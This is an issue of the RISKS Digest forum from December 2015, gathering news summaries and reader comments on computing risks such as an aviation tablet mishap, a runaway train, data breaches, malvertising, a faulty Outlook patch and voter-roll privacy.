Please try the URL privacy information feature enabled by clicking the flashlight icon above. This will reveal two icons after each link the body of the digest. The shield takes you to a breakdown of Terms of Service for the site - however only a small number of sites are covered at the moment. The flashlight take you to an analysis of the various trackers etc. that the linked site delivers. Please let the website maintainer know if you find this useful or not. As a RISKS reader, you will probably not be surprised by what is revealed…
A Qatar Airways Boeing 777 traveling from Miami to Doha struck airport lights during takeoff and suffered a 46-cm tear in the fuselage, thanks in part to a pilot zooming in too far on a tablet computer. Flight QR778 left Miami on September 15th but as it took off, hit airport landing lights. On arrival the plane was found to have suffered "a 46 cm tear in the fuselage behind the rear cargo door which breached the pressure vessel... numerous dents and scratches in the external airframe with 18 square meters of damaged skin." Inspection also found "90 external individual areas of damage requiring assessment and rectification [and] some damage to a metal guard on the left landing gear." A Qatar Civil Aviation Authority (QCAA) report on the incident suggests the crew were not familiar with the airport, so when the First Officer decided to take off from a point 411m down the runway the choice was queried but "The commander made a hand gesture and said something which he thought was seeking reassurance from the crew that everything was OK." http://www.theregister.co.uk/2015/12/11/tablet_computer_zoom_snafu_saw_plane_fly_13_hours_with_46cm_hole/ Gabriel Goldberg, Computers and Publishing, Inc. gabe@gabegold.com 3401 Silver Maple Place, Falls Church, VA 22042 (703) 204-0433
An MBTA train from Braintree ran through the next four stops after the driver got out to attend to a signal problem. It was stopped just after the North Quincy station, when power to the third rail was cut off. [PGN] https://www.bostonglobe.com/metro/2015/12/10/red-line-train-leaves-station-without-operator/L5NzTcDEX8dMQCQLvC7UBN/story.html The story is actually much more complicated. Controllers had to manually get trains that were ahead of the runaway to express out of the Braintree section onto the Red Line section, so that power could be shut off on the entire Braintree section. This is a fascinating hands-on dynamic systemic solution to an apparently unplanned event. My guess is that it might even suggest some systemic changes! [PGN] Eric Moskowitz, LATER: A call, then a scramble to stop runaway train https://www.bostonglobe.com/metro/2015/12/11/call-then-scramble-stop-runaway-train/3HvcszljJaLlANPPX5b6wN/story.html
Jack Ewing, *The New York Times*, 11 Dec 2015 http://www.nytimes.com/2015/12/11/business/international/vw-emissions-scandal.html In its most detailed explanation of what led to the scandal, the German automaker cited a chain of errors that were allowed to happen. ["There was a tolerance for breaking the rules."—Hans-Dieter Pötsch, chair of VW's Supervisory Board.]
Phillip Rogaway, The Moral Character of Cryptographic http://web.cs.ucdavis.edu/~rogaway/papers/moral.html This essay attempts to ground cryptography within larger political and ethical contexts to which I am no doubt sure will be of interest to the general population of RISKS readers. A side note, Google appears to be (in some instances) not providing users direct links to articles - Google instead provides links to Google with search terms. Have others noticed this? And if so, can anyone speculate as to why?
"He likened the danger posed by modern governments' growing surveillance capabilities to the threat of nuclear warfare in the 1950s, and called upon scientists to step up and speak out today, as they did then. I spoke to Rogaway about why cryptographers fail to see their work in moral terms, and the emerging link between encryption and terrorism in the national conversation. A transcript of our conversation appears below, lightly edited for concision and clarity." http://www.theatlantic.com/technology/archive/2015/12/the-moral-failure-of-computer-science/420012/
http://www.bostonglobe.com/business/2015/12/14/twitter-says-was-target-state-sponsored-hack/aqmmGtUBsOwYDbSePVyChJ/story.html
http://www.huffingtonpost.com/larry-magid/europe-could-kick-majorit_b_8774742.html European policymakers are considering a draft of the European Data Protection Regulation that would prohibit teens under 16 from participating in social media without parental consent. Up until this point, the draft Regulation set the age at 13, which is consistent with laws and practices around the world.
8 Dec 2015: Maine General https://www.mainegeneral.org/Pages/Home.aspx went public about this breach. 13 Nov 2015: the health care provider was notified by the FBI of evidence of a breach. They investigated & confirmed it, but do not have full details yet. For some patients, info taken includes real identity, address, phone, date of birth, emergency contact phone. They do not yet know how many, out of their approx 180,000 patients, but the info dates back to at least June 2009. Also some employees were breached, with similar info. So far, no evidence that credit financial info, social security #, or driver's license #s taken, Maine General is offering impacted persons access to one year of free credit monitoring and identity restoration services. https://www.mainegeneral.org/news/statement-regarding-mainegenerals-recent-cyber-attack http://www.govinfosecurity.com/fbi-detects-another-healthcare-cyberattack-a-8736
... Under the federal law known as HIPAA, it's illegal for health care providers to share patients' treatment information without their permission. The Office for Civil Rights, the arm of the Department of Health and Human Services responsible for enforcing the law, receives more than 30,000 reports about privacy violations each year. The bulk of the government's enforcement—and the public's attention -- has focused on a small number of splashy cases in which hackers or thieves have accessed the health data of large groups of people. But the damage done in these mass breaches has been mostly hypothetical, with much information exposed, but little exploited. https://www.propublica.org/article/small-scale-violations-of-medical-privacy-often-cause-the-most-harm
Cloud Lock https://www.cloudlock.com/ analyzed 10 million users, 1 billion files, 91,000 applications to survey risk across multiple industries. You have to register with them, to download their report. http://go.cloudlock.com/ebook-q3-2015-cybersecurity-report.html They found on average, 5% of companies bother with password, and other credentials, protection. K-12 is worst, at 1%. Retail "best" at 8%. For break down on others, see help net link. http://www.net-security.org/secworld.php?id214 99% of files in the financial services industry, which can be found by anyone who can find a link, or locate them via search engines, can be attributed to exposure by 1% of their users. The overall average of industries, in the article, is 74%. Health Care is most secure in that dept. Manufacturing shows the least concern for protecting PII, like social security #s. IDs, dates of birth, etc. Al Mac comments: Someone had to be in last place. I would have liked Critical Infrastructure to be a category, since I am now reading "Lights Out" by Ted Koppel. We have known for decades that security for our electric grid—cyber security and physical security, are both pretty dismal. Mainstream news media is now giving more attention to this topic thanks to Ted Koppel's reputation as a first class messenger. The electric grid can be taken down for all of USA, and take years for repair. An enormous volume of our civilization is dependent upon it -- water, transportation, communication, restocking groceries, hospitals. Millions will die. It is not *if* ISIS can do it, but when they will do it.
FYI—This is why you should *turn Javascript off* by default & remove all *add-ons* & *plug-ins*, including Java, Flash, video players, etc. With Javascript turned off, you don't even need an ad-blocker. Leaving Javascript turned on in your browser is the equivalent of leaving all of your power tools outside your house, so that a burglar doesn't even need to bring his/her own when attacking your house. It's actually even worse than that; you've left a remote-controlled *robot* outside your home that the burglar can take over and use to attack your home while he/she is sitting in the comfort of his/her home. http://www.wired.com/2015/12/hacker-lexicon-malvertising-the-hack-that-infects-computers-without-a-click/ Joseph Cox, *WiReD*, 9 Dec2015 Hacker Lexicon: Malvertising, the Hack That Infects Computers Without a Click Malvertising is when hackers buy ad space on a legitimate website, and, as the name suggests, upload malicious advertisements designed to hack site visitor's computers. The news page looked perfectly innocent. Apart from the reams of celebrity gossip stories and throw-away magazine layout, nothing about the the website for UK news site *The Daily Mail* seemed particularly malicious. But, if you visited the site in October, you might have fallen victim to a sophisticated hacking campaign without even realizing it. In the background of *The Daily Mail*, third-party advertisements were surreptitiously and automatically redirecting readers to powerful exploit kits, designed to install malware on their computers. This is the booming trade of malvertising: where cybercriminals rent out ads on sketchy corners of the Internet and popular sites alike, in order to infect the computers of as many people as possible. Plenty of Popular Sites Have Been Targeted [...] How Malvertising Works [...] How Can Malvertising Be Stopped? [...]
NNSquad http://www.dslreports.com/shownews/ATT-Fools-Entire-Media-With-Giant-Gigabit-Fiber-Bluff-135848 In reality, AT&T has consistently been cutting back its fixed-line investment budget and CAPEX to focus on more profitable wireless (read: usage capped) broadband. There's no budget for the kind of "real" fiber build AT&T's press release implies. In fact, while AT&T pats itself on the back for this latest build, it has been consistently trying to figure out how it can gut regulations in order to hang up on millions of DSL users it doesn't want to upgrade. And while AT&T this week promised its over-hyped fiber build will someday reach 14 million residential and commercial locations, they didn't give a timeline for this accomplishment. That means AT&T technically could be winding up this not-particularly ambitious attempt to cherry pick the nation's high-end development communities and university student condos—by 2030 or so. We're potentially talking about only a few hundred thousand lines per year, many at universities. Exactly. U-verse is fiber to the terminal, with the final leg almost always provided over copper and using DSL-technologies. What AT&T is doing is claiming a massive "fiber build-out" when in practice all they're mostly doing is providing a relatively few direct fiber connections to those terminals in special cases. But are they really planning to spend a pile of money deploying fiber (on poles and buried) to replace all that copper that serves most homes and businesses in their service areas? If you think so, there's a bridge across the East River in New York you might be interested in buying.
Oopsy: NY State Health Insurance Website Let You Download Other Users' Private Info (Gothamist via NNSquad) http://gothamist.com/2015/12/10/thanks_obama.php For an unknown period of time, anyone who logged onto the New York State health plan website had the ability to download a range of sensitive, private information belonging to other users. The incredible glitch was discovered by Robert Parks, a cofounder of Oyster, after he received an email last Saturday notifying him that he had a message from the New York State of Health website. ... I'll add a "don't be a jerk" message to the author of that article, because a security flaw in a NY State site is not the responsibility of Obamacare/ACA, but of idiots in New York.
I haven't seen any mention of this before so would like to learn more. There is a risk of the supposedly decentralized Internet relying on hierarchical naming, addressing and certificates. But that's a deeper topic. http://www.ibtimes.co.uk/john-mcafee-massive-ddos-attack-internet-was-smartphone-botnet-popular-app-1532993
For the second month in a row, a Patch Tuesday Outlook update raises havoc Woody Leonhard, InfoWorld, 9 Dec 2015 http://www.infoworld.com/article/3013219/microsoft-windows/microsoft-pulls-botched-patch-kb-3114409-that-triggered-problems-with-outlook-2010.html selected text: Microsoft's Patch Tuesday update KB 3114409, intended to help admins keep Outlook 2010 from starting in safe mode, has in fact done the opposite. Many Outlook 2010 customers report that installing KB 3114409 forces Outlook to start in safe mode. And you should reflect on how a patch this destructive ever made it through internal testing.
Woody Leonhard, InfoWorld, 9 Dec 2015 A look at recent patch lists for IE and Edge hints that many of IE's warts will continue to haunt us http://www.infoworld.com/article/3012987/microsoft-windows/microsoft-edge-has-inherited-many-of-internet-explorers-security-holes.html selected text: We're all anxiously awaiting the day that Windows 10's new Edge browser becomes usable. That hasn't happened yet, but it will some day next year. But looking at yesterday's Patch Tuesday announcement and the one for November has me wondering how much of this improved security is new bananas -- and how much is built on a rotten old foundation. The reason for my skepticism: Common Vulnerabilities and Exposures (CVEs). Each CVE entry is supposed to identify a unique security hole. The overlap between Internet Explorer CVEs and Edge CVEs shows that many security problems in IE have been inherited by Edge.
A hotel cannot examine names of potential guests and reject them based on race, the authors say, but that is common with short-term home rentals. http://www.nytimes.com/2015/12/12/business/discrimination-by-airbnb-hosts-is-widespread-report-says.html
Stop slouching over that tiny screen. It's bad for your self-esteem. http://www.nytimes.com/2015/12/13/opinion/sunday/your-iphone-is-ruining-your-posture-and-your-mood.html
FYI—We've got the kids playing with matches in the barn again—H. Baker "Mommy, please tell me again, how did World War I begin?" http://www.nytimes.com/2015/11/27/opinion/world-war-iii.html "Anything that has a computer anywhere on earth can be stopped or taken over" "Stuxnet was a game changer. The Internet became a much more dangerous place after that, because almost literally everybody started to say the gloves are off now." "If we are under attack, you can't just try to catch every arrow. You have to take care of the person shooting the arrows at you." [Assuming that you know or can find out who's shooting at you.] "Part of the problem is that there are so many senior people in the government, especially coming out of the political world, that just don't understand enough about the technology. They really are remarkably uninformed."
With regard to "Students who use computers very frequently at school do a lot worse in most learning outcomes, even after accounting for social background and student demographics": See also my post in 28.57's "Re: As We Age, Smartphones Don't Make Us Stupid ... (LW, RISKS 28.56)" where I detailed my similar experience in a university course.
I stopped voting in 2006 and assumed, because of repeated warnings printed on sample ballots, that my name would be purged from the voting rolls if I failed to vote in three consecutive elections. Three consecutive elections went by and I was still getting election junk mail, so I phoned the office of the Registrar of Voters, explained that I hadn't voted in the past three elections, did not intend to vote in future elections, and requested that my name be removed from the voting rolls. They assured me they'd take care of it. Two more elections pass, and despite a few more phone calls, I was still getting election junk mail. So I took the long bus trip out to the Registrar's office and they had me fill out a form requesting that my name be removed from the rolls. Problem solved? Not at all. It took me three more years of repeated requests before they finally removed my name from the rolls and the junk mail stopped coming. I had several reasons for wanting my name off the rolls, including the reduction of junk mail, a vague suspicion that when elections officials were caught manufacturing "phantom votes," it would have been relatively easy for them to have used the names of people who were registered but hadn't voted, and that I thought it inappropriate for me, as a non-voter and an election boycott advocate, to remain a registered voter. Learning about the political dossiers kept on every US voter feels like a sort of vindication to me—that for privacy issues alone my struggle to get unregistered was well worth the time and effort it cost.
It seems that the designers of autonomous vehicles are finally encountering what every new driver should realize early on: Operating a vehicle, even in an urban environment, is the easy part; but driving is really about teamwork.
When my daughter was about 8, she used to play a lot in a MRPG which enabled players to earn "game money" by meeting challenges, and using it to buy stuff for their avatar. Game money could also be received at the game's bank by redeeming coupons which were handed out in some stores when buying certain children's products - clothes, toys etc.—for real money. My daughter usually spent all her earnings on shopping sprees, so she never had more than 1000 game coins. One day I noticed she suddenly had 32,000 coins; when asked how she got them, she said "from the Bank!". It seems that she just got into Google and typed "where can I get coupon codes for <Game name>"; it brought her into a site of young hackers—actually, they did not do much hacking, some kids just filmed themselves playing the game (they did not even know about screen capture) and posted the clips on YouTube; my daughter simply stopped the video and copied the codes! Amazingly, the games accepted these. I'm still waiting for a knock on my door by FBI agents who'd come to inquire who at this address had broken into the Pentagon...
"Many children will have an active interest in coding, spend a lot of time online and have independent learning materials. These are all signs of a healthy and positive interest in computing. "The UK needs as many people interested in coding as possible. Coding and programming are extremely valuable skills and if your child has an interest you should actively encourage them to do so - but in a lawful way." I suggest people visit the actual web site; it doesn't say any such thing [as suggested by Lauren].
FYI—And what % of parents can realistically follow this advice: "If a young person is showing some of these signs try and have a conversation with them about their online activities. This will allow you to assess their computer knowledge proficiency so you can understand what they are doing, explain the consequences of cyber crime and help them make the right choices." Perhaps Eric Schmidt's plan to destroy the First Amendment using AI can also detect/prevent your child's (or your own) cyber "pre-crime": http://www.nytimes.com/2015/12/07/opinion/eric-schmidt-on-how-to-build-a-better-web.html http://oomlout.co.uk/blogs/news/79367233-national-crime-agency-lists-daft-cyber-crime-warning-signs
Please report problems with the web pages to the maintainer